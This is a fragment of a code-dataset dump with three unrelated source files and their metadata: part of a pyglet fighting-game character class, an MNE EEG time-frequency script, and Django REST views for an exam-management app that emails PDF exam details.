self.targetFrame = self.frames22\n if self.frame >= len(self.frames22) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n\n #Medium Kick\n if self.action == 11:\n self.targetFrame = self.frames21\n if self.frame >= len(self.frames21) - 1:\n self.frame = 0\n self.action = 0\n \n #Medium Kick Crouch\n if self.action == 11.5:\n self.targetFrame = self.frames23\n if self.frame >= len(self.frames23) - 1:\n self.frame = 0\n self.velocity = 0\n self.state = \"Grounded\"\n self.action = 0\n self.slideDirection = 0\n self.force = [0,0]\n \n #Spin Knuckle(Start)\n if self.action == 12:\n self.targetFrame = self.frames27\n if self.frame >= len(self.frames27) - 1:\n self.Play(\"Audio/jump.wav\")\n self.action = 12.5\n self.jumpHeight = 6\n self._height()\n self.frame = 0\n \n #Spin Knuckle(Mid)\n if self.action == 12.5:\n if self.frame < 1 and self.voiceFrame != -1:\n self.invincible = True\n choice = random.choice([\"Audio/Champs/Cammy/spin_knuckle.wav\", \"Audio/Champs/Cammy/Grunt/51e.wav\",\n \"Audio/Champs/Cammy/Grunt/52e.wav\"])\n self.PlayVoice(choice)\n self.voiceFrame = -1\n self.force = [7.2,5]\n self.damage = 30\n self.vel[0] = -3\n self.targetFrame = self.frames40\n if self.frame >= len(self.frames40) - 1:\n self.voiceFrame = 0\n self.frame = 0\n \n #Spin Knuckle(End)\n if self.action == 12.8:\n self.targetFrame = self.frames41\n if self.frame < 1 and self.voiceFrame != -1:\n self.Play(\"Audio/land.wav\")\n self.voiceFrame = -1\n if self.frame >= 
len(self.frames41) - 1:\n self.velocity = 0\n self.action = 0\n self.voiceFrame = 0\n self.force = [0,0]\n self.state = \"Grounded\"\n self.invincible = False\n \n #Stand Block (Normal)\n if self.action == 13:\n self.targetFrame = self.frames29\n self.frame = 0\n self.blockWait += 1\n if self.blockWait >= 20:\n self.action = 0\n self.blockWait = 0\n self.blockRight = False\n self.blockLeft = False\n if self.moveRight:\n self.right = True\n if self.moveLeft:\n self.left = True\n \n #Stand Block (Hit)\n if self.action == 13.5:\n self.targetFrame = self.frames29\n self.frame = 1\n self.blockWait += 1\n self.state = \"BlockHit\"\n if self.blockWait >= 10:\n self.action = 13\n self.blockWait = 0\n self.state = \"Grounded\"\n \n #Crouch Block (Normal)\n if self.action == 14:\n self.targetFrame = self.frames29\n self.frame = 2\n self.blockWait += 1\n self.state = \"Crouch\"\n if self.blockWait >= 10:\n self.action = 4\n self.blockWait = 0\n self.blockRight = False\n self.blockLeft = False\n if self.moveRight:\n self.right = True\n if self.moveLeft:\n self.left = True\n \n #Crouch Block (Hit)\n if self.action == 14.5:\n self.targetFrame = self.frames29\n self.frame = 3\n self.blockWait += 1\n self.state = \"CrouchBlockHit\"\n if self.blockWait >= 20:\n self.action = 14\n self.blockWait = 0\n \n #Cannon Drill(Start)\n if self.action == 17:\n self.targetFrame = self.frames24\n if self.frame >= len(self.frames24) - 1:\n self.vel[0] = -5\n self.frame = 0\n self.jumpHeight = 4\n self._height() \n choice = random.choice([\"Audio/Champs/Cammy/cannon_drill_A.wav\", \"Audio/Champs/Cammy/cannon_drill_B.wav\"])\n self.PlayVoice(choice)\n self.action = 17.3\n self.superSkill = False\n \n #Cannon Drill(Mid)\n if self.action == 17.3:\n self.force = [6.3,4.7]\n self.freezeInAir = True\n self.targetFrame = self.frames25A\n if self.targetFrame[int(self.frame)] == 82 and self.voiceFrame != 82:\n self.Play(\"Audio/wiff.wav\")\n self.voiceFrame = 82\n self.invincible = False\n if self.frame >= len(self.frames25) - 1:\n if self.kickLoop > 0:\n self.voiceFrame = 0\n self.kickLoop -= 1\n self.frame = 0\n else:\n self.kickLoop = 6\n self.force = [0,0]\n self.action = 17.5\n\n #End Cannon Drill if opponent is blocking\n blockStates = [13.5, 14.5]\n if self.opponent.action in blockStates:\n self.freezeInAir = False\n self.frame = 0\n self.action = 17.8\n self.targetFrame = self.frames25C\n self.kickLoop = 6\n self.vel[0] = 8\n self.vel[1] = 9\n \n #Cannon Drill(End)\n if self.action == 17.5:\n self.freezeInAir = False\n self.targetFrame = self.frames25B\n if self.frame >= len(self.frames25B) - 1:\n self.frame = 0\n self.action = -1\n\n\n #Cannon Drill Cancel\n if self.action == 17.8:\n self.freezeInAir = False\n self.targetFrame = self.frames25C\n if self.frame >= len(self.frames25C) - 1:\n self.frame = 0\n self.action = -1\n \n \n \n #Command Grab - Main (Start)\n if self.action == 19:\n self.targetFrame = self.frames42\n if self.voiceFrame != self.frame and self.frame >= len(self.frames42) - 2:\n self.voiceFrame = self.frame\n self.Play(\"Audio/wiff.wav\")\n self.force = [5,0]\n if self.frame >= len(self.frames42) - 1:\n self.frame = 0\n self.action = -100\n hits = [6, 6.3, 6.5]\n if self.opponent.hitCD < 1:\n #If the opponent is airborne\n if self.opponent.pos[1] > self.ground:\n self.opponent.pos[1] = self.ground\n self.opponent.state = \"Grounded\"\n self.opponent.action = random.choice(hits)\n self.opponent.frame = 0\n self.opponent.fall = False\n self.opponent.jump == False\n self.opponent.vel[1] = 0\n\n #If it 
hits\n if self.opponent.action in hits:\n self.action = self.grabChain\n self.targetGrabbed = self.opponent\n self.grabChain = 19.2\n self.targetGrabbed.frameSpeed = .05\n self.targetGrabbed.toGrab = True\n \n #Command Grab - A (Start)\n if self.action == 19.1:\n self.targetFrame = self.frames43\n if self.frame >= len(self.frames43) - 1:\n if self.voiceFrame != -1:\n self.voiceFrame = -1\n self.Play(\"Audio/jump.wav\")\n self.jumpHeight = 3\n self.gravity = .3\n self.vel[0] = -4\n self._height()\n self.frame = len(self.frames43) - 1\n hits = [6, 6.3, 6.5, 13.5, 14.5]\n \n #Command Grab A (Caught)\n if self.action == 19.2:\n self.isGrabbing = True\n self.targetFrame = self.frames44\n catchFrames = [23, 23, 23.3, 23.3, 23.3, 23.8, 23.8]\n self.opponent.action = catchFrames[int(self.frame)]\n self.force = [6 * self.direction,3]\n self.vel[0] = 2 * self.direction\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/50e.wav\", \"Audio/Champs/Cammy/Grunt/49e.wav\", \"Audio/Champs/Cammy/Grunt/48e.wav\"])\n if self.targetFrame[int(self.frame)] == 120 and self.voiceFrame != self.targetFrame[int(self.frame)]:\n self.voiceFrame = self.targetFrame[int(self.frame)]\n self.PlayVoice(choice)\n if self.frame >= len(self.frames44) - 1:\n self.targetGrabbed.frameSpeed = self.oldSpeed\n self.targetGrabbed.isGrabbed = False\n self.targetGrabbed.bounce = 1\n self.targetGrabbed.toGrab = False\n self.targetGrabbed.Get_Hit(attacker=self, damage=self.damage, force=self.force, typeHit=\"Ground\")\n self.targetGrabbed = None\n self.isGrabbing = False\n self.frame = len(self.frames44) - 1\n self.action = 7.5\n self.jump = True\n self.gravity = .8\n self.force = [0,0]\n\n #Shun' Po (Start)\n if self.action == 30:\n self.targetFrame = self.frames45\n self.force = [3, 16]\n self.invincible = True\n if self.targetFrame[int(self.frame)] == 64 and self.voiceFrame != 64:\n self.voiceFrame = 64\n self.Play(\"Audio/wiff.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/42e.wav\", \"Audio/Champs/Cammy/Grunt/43e.wav\"])\n self.PlayVoice(choice)\n if self.frame >= len(self.frames45) - 1:\n self.frame = 0\n self.action = 0\n self.voiceFrame = 0\n self.invincible = False\n self.state = \"Grounded\"\n if self.opponent.fall:\n self.state = \"Skill\"\n self.action = 30.1\n self.jumpHeight = 9\n self._height()\n self.Play(\"Audio/jump.wav\")\n \n ##Shun' Po -> Air Attack (Leap) -> Punch\n if self.action == 30.1:\n self.targetFrame = self.frames45B\n self.velocity = 2 * self.direction * -1\n if self.frame >= len(self.frames45B) - 1:\n self.frame = 0\n self.action = 30.2\n self.vel[1] = self.jumpHeight\n if self.hitKick == \"MK\":\n self.action = 30.4\n self.vel[1] += 3\n \n ##Shun' Po -> Air Attack (First) -> Punch\n if self.action == 30.2:\n self.force = [3, 6]\n self.targetFrame = self.frames45C\n if self.targetFrame[int(self.frame)] == 69 and self.voiceFrame != 69:\n self.voiceFrame = 69\n self.Play(\"Audio/wiff.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/42e.wav\", \"Audio/Champs/Cammy/Grunt/43e.wav\"])\n if self.frame >= len(self.frames45C) - 1:\n self.frame = 0\n self.voiceFrame = 0\n self.action = 30.3\n self.vel[1] = 6\n time.sleep(.05)\n \n ##Shun' Po -> Air Attack (Second) -> Punch\n if self.action == 30.3:\n self.force = [8, 4]\n self.targetFrame = self.frames45D\n if self.targetFrame[int(self.frame)] == 72 and self.voiceFrame != 72:\n self.voiceFrame = 72\n self.Play(\"Audio/wiff.wav\")\n self.jumpHeight = 5\n self.vel[1] = self.jumpHeight\n choice = 
random.choice([\"Audio/Champs/Cammy/Grunt/42e.wav\", \"Audio/Champs/Cammy/Grunt/43e.wav\"])\n if self.frame >= len(self.frames45D) - 1:\n self.frame = len(self.frames45D) - 1\n self.voiceFrame = 0\n\n\n ##Shun' Po -> Air Attack (First) -> Kick\n if self.action == 30.4:\n self.inAfterImage = True\n self.force = [3, 3]\n self.damage = 30\n self.targetFrame = self.frames46\n if self.vel[1] <= 0:\n self.jumpHeight = 0\n self.vel[1] = self.jumpHeight\n if self.targetFrame[int(self.frame)] == 76 and self.voiceFrame != 76:\n self.voiceFrame = 76\n self.Play(\"Audio/wiff.wav\")\n if self.frame >= len(self.frames46) - 1:\n self.frame = 0\n self.voiceFrame = 0\n self.action = 30.5\n time.sleep(.05)\n \n ##Shun' Po -> Air Attack (Second) -> Kick\n if self.action == 30.5:\n self.force = [8, 7]\n self.targetFrame = self.frames46B\n if self.targetFrame[int(self.frame)] == 74 and self.voiceFrame != 74:\n self.voiceFrame = 74\n self.Play(\"Audio/wiff.wav\")\n self.jumpHeight = 0\n self.vel[1] = self.jumpHeight\n choice = random.choice([\"Audio/Champs/Cammy/Grunt/45e.wav\", \"Audio/Champs/Cammy/Grunt/46e.wav\", \"Audio/Champs/Cammy/Grunt/48e.wav\",\n \"Audio/Champs/Cammy/Grunt/54_2e.wav\"])\n self.PlayVoice(choice)\n if self.frame >= len(self.frames46B) - 1:\n self.frame = len(self.frames46B) - 1\n self.voiceFrame = 0\n self.inAfterImage = False\n \n \n #Super Cannon Drill (Start)\n if self.action == 31:\n self.targetFrame = self.frames24\n if self.frame >= len(self.frames24) - 1:\n self.frame = 0\n self.action = 31.5\n \n \n \n \n #Throwing(Catching)\n if self.action == 21:\n self.isGrabbing = True\n self.targetFrame = self.frames37\n if self.frame >= len(self.frames37) - 1:\n self.isGrabbing = False\n self.frame = 0\n self.action = 0\n \n #Throwing(Caught)\n if self.action == 22:\n self.backSpring = True\n self.isGrabbing = True\n self.targetFrame = self.frames38\n self.targetGrabbed.action = self.catchFrames[int(self.frame)]\n self.force = [6,1]\n if self.frame >= len(self.frames38) - 1:\n self.targetGrabbed.isGrabbed = False\n self.targetGrabbed.Get_Hit(attacker=self, damage=self.damage, force=self.force, typeHit=\"FireBall\")\n self.targetGrabbed = None\n self.isGrabbing = False\n self.action = 7.5\n self.fallHeight = 3\n self.fall = True\n self.force = [0,0]\n self.frame = len(self.frames38) - 1\n \n\n #Dummy\n if self.action == -100:\n self.action = 0\n self.state = \"Grounded\"\n self.isGrabbing = False\n self.isControlled = True\n \n #Getting Caught A (Ground)\n if self.action == 23:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 0\n \n #Getting Caught B (Ground)\n if self.action == 23.3:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 1\n \n #Getting Caught C (Mid)\n if self.action == 23.6:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 2\n \n #Getting Caught D (High)\n if self.action == 23.8:\n self.targetFrame = self.frames39\n self.isGrabbed = True\n self.frame = 3\n\n\n\n ############ End Game ############\n #Win - To - Sub Animation Win\n if self.action == 20:\n self.targetFrame = self.frames30\n if self.frame >= len(self.frames30) - 1:\n choice = [20.2, 20.5]\n self.action = random.choice(choice)\n self.frame = 0\n if self.voiceCD <= 0:\n if self.winCount == 1:\n self.Play(self.wins[0][1][0])\n if self.winCount >= 2:\n choice = random.choice([0,1])\n self.Play(self.wins[1][1][choice])\n \n #Sub Animation Win (Shuffule Arms)\n if self.action == 20.2:\n self.targetFrame = self.frames31\n if self.frame >= 
len(self.frames31) - 1:\n self.frame = len(self.frames31) - 1\n \n #Sub Animation Win 2B (Turn Around)\n if self.action == 20.5:\n self.targetFrame = self.frames33\n if self.frame >= len(self.frames33) - 1:\n self.frame = len(self.frames33) - 1\n \n \n #Idle - Taunt (Loop)\n if self.action == -4:\n self.targetFrame = self.frames36B\n if self.frame >= len(self.frames36B) - 1:\n self.action = -5\n self.frame = 0\n \n #Taunt\n if self.action == -5:\n self.targetFrame = self.frames36\n if self.frame >= len(self.frames36) - 1:\n self.action = 0\n self.frame = 0\n \n \n #Idle - Response Taunt (Loop)\n if self.action == -4.5:\n self.targetFrame = self.frames35B\n if self.frame >= len(self.frames35B) - 1:\n self.action = -6\n self.frame = 0\n\n \n #Respond Taunt\n if self.action == -6:\n self.targetFrame = self.frames35\n if self.frame >= len(self.frames35) - 1:\n self.frame = 0\n self.targetFrame = self.frames1\n self.action = 0\n \n self.Update_Grab()\n self.Update_Graphics()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n", "repo_name": "Rex-445/cxc", "sub_path": "Project/Cammy.py", "file_name": "Cammy.py", "file_ext": "py", "file_size_in_byte": 43066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyglet.image.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pyglet.image", "line_number": 7, "usage_type": "attribute"}, {"api_name": "champion.Champion", "line_number": 10, "usage_type": "name"}, {"api_name": "pyglet.sprite.Sprite", "line_number": 33, "usage_type": "call"}, {"api_name": "pyglet.sprite", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyglet.media.load", "line_number": 92, "usage_type": "call"}, {"api_name": "pyglet.media", "line_number": 92, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 278, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 291, "usage_type": "call"}, {"api_name": "pyglet.media.load", "line_number": 315, "usage_type": "call"}, {"api_name": "pyglet.media", "line_number": 315, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 552, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 638, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 708, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 744, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 770, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 804, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 810, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 821, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 843, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 854, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 940, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 946, "usage_type": "call"}]} +{"seq_id": "38625813498", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 16:55:00 2016\n\n@author: mje\n\"\"\"\n\nimport mne\nimport numpy as np\nfrom my_settings import (epochs_folder, tf_folder)\nfrom mne.time_frequency import tfr_array_morlet\nimport sys\n\nsubject = sys.argv[1]\n\nfreqs = np.arange(8, 13, 1) # define frequencies of interest\nn_cycles = 4. # freqs / 2. 
# different number of cycle per frequency\n\nsides = [\"left\", \"right\"]\nconditions = [\"ctl\", \"ent\"]\n\nepochs = mne.read_epochs(\n epochs_folder + \"%s_trial_start-epo.fif\" % subject, preload=True)\nepochs.resample(250)\n\nfor cond in conditions:\n for side in sides:\n power = tfr_array_morlet(\n epochs[cond + \"/\" + side],\n sfreq=epochs.info[\"sfreq\"],\n frequencies=freqs,\n n_cycles=n_cycles,\n use_fft=True,\n output=\"complex\",\n n_jobs=1)\n np.save(tf_folder + \"%s_%s_%s-4-complex-tfr.npy\" %\n (subject, cond, side), power)\n", "repo_name": "MadsJensen/CAA", "sub_path": "tfr_complex_all.py", "file_name": "tfr_complex_all.py", "file_ext": "py", "file_size_in_byte": 959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 16, "usage_type": "call"}, {"api_name": "mne.read_epochs", "line_number": 22, "usage_type": "call"}, {"api_name": "my_settings.epochs_folder", "line_number": 23, "usage_type": "name"}, {"api_name": "mne.time_frequency.tfr_array_morlet", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 36, "usage_type": "call"}, {"api_name": "my_settings.tf_folder", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "73995048169", "text": "from django_filters.rest_framework import DjangoFilterBackend\nfrom django.http import Http404\nfrom django.core.mail import EmailMultiAlternatives, EmailMessage, send_mail\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework import filters, pagination\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom itertools import chain\n\n# for generating pdf invoice\nimport os\nfrom io import BytesIO\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.staticfiles import finders\nfrom django.template.loader import render_to_string\nfrom qrcode import *\n\nfrom examiner.renderers import ExamRenderer\nfrom examiner.models import Exam\nfrom examiner.serializers import ExamSerializer, ExamCreateSerializer, ExamListSerializer\nfrom examiner.custom_permissions import IsExaminerPermission, IsOwnExaminerPermission\nfrom author.models import Question\nfrom admin_site.settings import FRONT_END_DOMAIN_LINK, MEDIA_ROOT\n\n\nEXAM_LINK = FRONT_END_DOMAIN_LINK + 'attend_exam/check_start_exam/'\n\n# craete pdf and qr code and mail to exmainer\ndef send_pdf_mail(exam, user):\n \n data = {\n 'exam_id' : exam['id'],\n 'exam_title' : exam['title'],\n 'exam_description' : exam['description'],\n 'exam_is_time_limit' : exam['is_time_limit'],\n 'exam_time_limit_hour' : exam['time_limit_hour'],\n 'exam_time_limit_minute' : exam['time_limit_minute'],\n 'exam_start_time' : exam['start_time'],\n 'exam_end_time' : exam['end_time'],\n 'exam_exam_link' : exam['exam_link'],\n 'exam_created_by_name' : user.name,\n 'exam_created_by_email' : user.email,\n 'MEDIA_ROOT' : MEDIA_ROOT\n }\n\n fdata = exam['exam_link']\n qrcode = make(fdata)\n qrcode.save(\"media/qrcode/exam/\"+str(exam['id'])+\".png\")\n \n template = get_template('exam/mailExamDetailPdf.html')\n html = 
template.render(data)\n result = BytesIO()\n pdf = pisa.pisaDocument(BytesIO(html.encode(\"ISO-8859-1\")), result)#, link_callback=fetch_resources)\n pdf = result.getvalue()\n filename = 'ExamDetail.pdf'\n\n subject = 'Exam Created'\n message = render_to_string('exam/mailExamDetailText.html', data)\n recipient = user.email\n email = EmailMessage(subject, \n message,\n os.environ.get('EMAIL_USER'),\n [recipient]\n )\n \n # email.attach_alternative(message, \"text/html\")\n email.attach(filename, pdf, 'application/pdf')\n email.send(fail_silently=True)\n\n\nclass MyPageNumberPagination(pagination.PageNumberPagination):\n page_size = 3\n max_page_size = 5\n page_size_query_param = 'records'\n # page_query_param = 'p'\n # last_page_strings = 'end'\n\n\n# create new Exam with Selected Questions\nclass CreateExamWithSelectedQuestionsAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n \n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n\n def post(self, request, format=None):\n serializer = ExamCreateSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n serializer.save()\n\n exam = serializer.data\n\n send_pdf_mail(exam, request.user)\n\n return Response({'msg': 'Exam Created Successfully. Please Check your Mail.','data': serializer.data}, status=status.HTTP_201_CREATED)\n \n\n# create new Exam with Random Questions \nclass CreateExamWithRandomQuestionsAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n \n def perform_create(self, serializer):\n serializer.save(created_by=self.request.user)\n\n def post(self, request, format=None):\n total_question = request.data.get('total_question')\n random_question = request.data.get('random_question')\n\n if(random_question > 0):\n randomQues = Question.objects.all().order_by('?')[:random_question]\n ques = randomQues\n else:\n easy_question = request.data.get('easy_question')\n medium_question = request.data.get('medium_question')\n hard_question = request.data.get('hard_question')\n\n easyQues = Question.objects.filter(level='Easy').order_by('?')[:easy_question]\n mediumQues = Question.objects.filter(level='Medium').order_by('?')[:medium_question]\n hardQues = Question.objects.filter(level='Hard').order_by('?')[:hard_question]\n ques = list(chain(easyQues, mediumQues, hardQues))\n\n questions = []\n num = 0\n for que in ques:\n num += 1\n questions.append({'question':que.id, 'number':num})\n\n request.data['total_question'] = total_question\n request.data['questions'] = questions\n serializer = ExamCreateSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n serializer.save()\n\n exam = serializer.data\n send_pdf_mail(exam, request.user)\n\n return Response({'msg': 'Exam Created Successfully. 
Please Check your Mail.','data': serializer.data}, status=status.HTTP_201_CREATED)\n \n\n# Mail Link of single Exam\nclass MailExamLinkAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.objects.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def post(self, request, pk, format=None):\n exam = self.get_object(pk)\n self.check_object_permissions(request, exam)\n users = request.data['users']\n \n for user in users:\n subject = f'''Give Exam of {exam.title}'''\n message = f'''Dear {user},\n Give Your Best in Exam \\n \n Exam title : {exam.title}\\n\n Exam description : {exam.description}\\n\n Exam taken By : {exam.created_by.email}\\n\n Exam Link : {exam.exam_link}\\n\n Best of Luck'''\n send_mail(\n subject,\n message,\n # settings.EMAIL_HOST_USER,\n request.user.email,\n [user],\n fail_silently=False,\n )\n return Response({'users':users,'msg':'Mail Sent Successfully'}, status=status.HTTP_200_OK)\n\n\n# list Exam by me\nclass RetriveExamByMeAPIView(ListAPIView):\n # renderer_classes = [QuestionRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n # queryset = Question.everything.all()\n serializer_class = ExamListSerializer\n filter_backends = [DjangoFilterBackend, filters.OrderingFilter, filters.SearchFilter]\n filterset_fields = ['is_active','created_by','is_deleted']\n ordering_fields = ['is_active','created_by','created_at','created_at']\n ordering = ['-created_at'] # default order\n search_fields = ['^title', 'description']\n # pagination_class = MyPageNumberPagination\n\n def get_queryset(self):\n user = self.request.user\n return Exam.own_objects.filter(created_by = user)\n\n\n# get single Exam By Examiner\nclass RetriveExamDetailByExaminerAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated]\n def get_object(self, pk):\n try:\n return Exam.objects.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def get(self,request, pk, format=None):\n Exam = self.get_object(pk)\n serializer = ExamListSerializer(Exam)\n return Response({'data':serializer.data}, status=status.HTTP_200_OK) \n\n\n# get single Exam for register time\nclass RetriveExamDetailForRegisterAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [AllowAny]\n def get_object(self, pk):\n try:\n return Exam.objects.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def get(self,request, pk, format=None):\n Exam = self.get_object(pk)\n serializer = ExamSerializer(Exam)\n return Response({'data':serializer.data}, status=status.HTTP_200_OK)\n\n\n# update single Exam\nclass UpdateExamAPIView(APIView):\n # renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n exam = self.get_object(pk)\n self.check_object_permissions(request, exam)\n serializer = ExamSerializer(instance=exam, data=request.data, partial=True)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response({'msg': 'Exam Updated Successfully','data': serializer.data}, status=status.HTTP_200_OK)\n return 
Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# soft delete single Exam\nclass DeleteExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def delete(self, request, pk, format=None):\n Exam = self.get_object(pk)\n self.check_object_permissions(request, Exam)\n Exam.soft_delete()\n Exam.is_updated = True\n Exam.save()\n return Response({'msg': 'Exam Deleted Successfully'}, status=status.HTTP_200_OK)\n\n\n# restore single Exam\nclass RestoreExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n exam = self.get_object(pk)\n self.check_object_permissions(request, exam)\n exam.restore()\n exam.is_updated = True\n exam.save()\n return Response({'msg': 'Exam Restored Successfully'}, status=status.HTTP_200_OK)\n\n\n# soft Deactivate single Exam\nclass DeactivateExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n Exam = self.get_object(pk)\n self.check_object_permissions(request, Exam)\n Exam.deactivate()\n Exam.is_updated = True\n Exam.save()\n return Response({'msg': 'Exam Deactivated Successfully'}, status=status.HTTP_200_OK)\n\n\n# soft Activate single Exam\nclass ActivateExamAPIView(APIView):\n renderer_classes = [ExamRenderer]\n permission_classes = [IsAuthenticated, IsExaminerPermission, IsOwnExaminerPermission]\n message = \"You are not Authenticated to access to permission\"\n def get_object(self, pk):\n try:\n return Exam.everything.get(pk=pk)\n except Exam.DoesNotExist:\n raise Http404\n \n def put(self, request, pk, format=None):\n Exam = self.get_object(pk)\n self.check_object_permissions(request, Exam)\n Exam.activate()\n Exam.is_updated = True\n Exam.save()\n return Response({'msg': 'Exam Activated Successfully'}, status=status.HTTP_200_OK)\n\n\n", "repo_name": "Umesh-310/project_code_test", "sub_path": "Django_Demo_Project-main/examiner/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "admin_site.settings.FRONT_END_DOMAIN_LINK", "line_number": 35, "usage_type": "name"}, {"api_name": "admin_site.settings.MEDIA_ROOT", "line_number": 52, "usage_type": "name"}, {"api_name": "qrcode.save", "line_number": 57, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 59, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 61, "usage_type": "call"}, {"api_name": "xhtml2pdf.pisa.pisaDocument", "line_number": 62, "usage_type": "call"}, {"api_name": "xhtml2pdf.pisa", "line_number": 62, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 62, 
"usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 67, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMessage", "line_number": 69, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 71, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 71, "usage_type": "attribute"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 80, "usage_type": "attribute"}, {"api_name": "rest_framework.pagination", "line_number": 80, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 89, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 91, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 91, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamCreateSerializer", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 107, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 107, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 113, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 113, "usage_type": "name"}, {"api_name": "author.models.Question.objects.all", "line_number": 124, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 124, "usage_type": "name"}, {"api_name": "author.models.Question.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 131, "usage_type": "name"}, {"api_name": "author.models.Question.objects.filter", "line_number": 132, "usage_type": 